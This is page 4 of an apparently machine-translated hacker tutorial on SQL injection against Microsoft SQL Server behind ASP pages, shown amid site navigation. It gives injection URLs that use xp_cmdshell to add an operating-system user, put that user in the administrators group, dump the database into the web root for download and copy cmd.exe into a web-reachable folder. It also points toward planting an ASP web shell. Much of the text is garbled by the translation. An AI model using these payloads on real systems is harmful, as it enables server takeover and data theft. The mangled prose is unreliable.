Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
The hacker teaches you anything is the SQL injection method attack(4)
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 13
Total 10 pages, Current page:4, Jump to page:
 

With: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 may list in storehouse ChouYFD all user establishment table.  
 
syscolumns: In each table and view each row occupies a line in the table, saves in the process each parameter also to occupy a line in the table. This epi-position in each database. The main field includes:
 
name, id, colid: Respectively was the field name, the table ID number, the field ID number, in which ID on just we used the table ID number which sysobjects obtained.
With: select * from ChouYFD.dbo.syscolumns where id=123456789 obtains in ChouYFD this storehouse, table ID is 123456789 all field tabulations.  

Third, determines XP_CMDSHELL to be possible the operational practice
If the current connection data's account number has the SA jurisdiction, and the master.dbo.xp_cmdshell expansion memory process (transfers this memory process to be possible to use operating system's shell to be able directly) to carry out correctly, then the entire computer may control completely through the following several methods, the later all steps may save
1st, HTTP://xxx.xxx.xxx/abc.asp? p=YY&nb… er>0 the abc.asp execute exception but may obtain current connection database user (, if demonstrates dbo on behalf of SA).
2nd, HTTP://xxx.xxx.xxx/abc.asp? p=YY… me()>0 the abc.asp execute exception but may obtain current connection database.
3rd, HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master. .xp_cmdshell “net user aaa bbb /add”-- (master is the SQL-SERVER main database; In the name semicolon expressed that before SQL-SERVER carries out the semicolon sentence name, continues to carry out its following sentence; “-” is the illustration, indicated that its behind all contents are only the annotation, the system execution) may not increase operating system account household aaa, the password are bbb directly.
4th, HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master. .xp_cmdshell “net localgroup administrators aaa /add”-- Account household aaa which just increased adds to the administrators group.
5th, HTTP://xxx.xxx.xxx/abc.asp? p=YY; backuup database database to disk='c:\inetpub\wwwroot\save.db' the data content full backup which obtains to the WEB table of contents, uses HTTP (natural first choice to again know this document downloading the WEB hypothesized catalog). I, kF=? s3? $  
6th, through duplicates CMD to found the UNICODE crack
HTTP://xxx.xxx.xxx/abc.asp? p=YY; exe… dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” has then made a UNICODE crack, through this crack's use method, then completed (natural first choice must know the WEB hypothesized catalog) to the entire computer's control.
   
 
Fourth, discovers the WEB hypothesized catalog “?
Only then found the WEB hypothesized catalog, could determine that laid aside the ASP wooden horse's position, then obtained the USER jurisdiction. Two methods are quite effective.

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * Next>>
Prev:The random combined command achieves exempts kills Next:The SQL weak password 1433 catch the chicken to meet the question

Comment:

Category: Home > hacker course
Home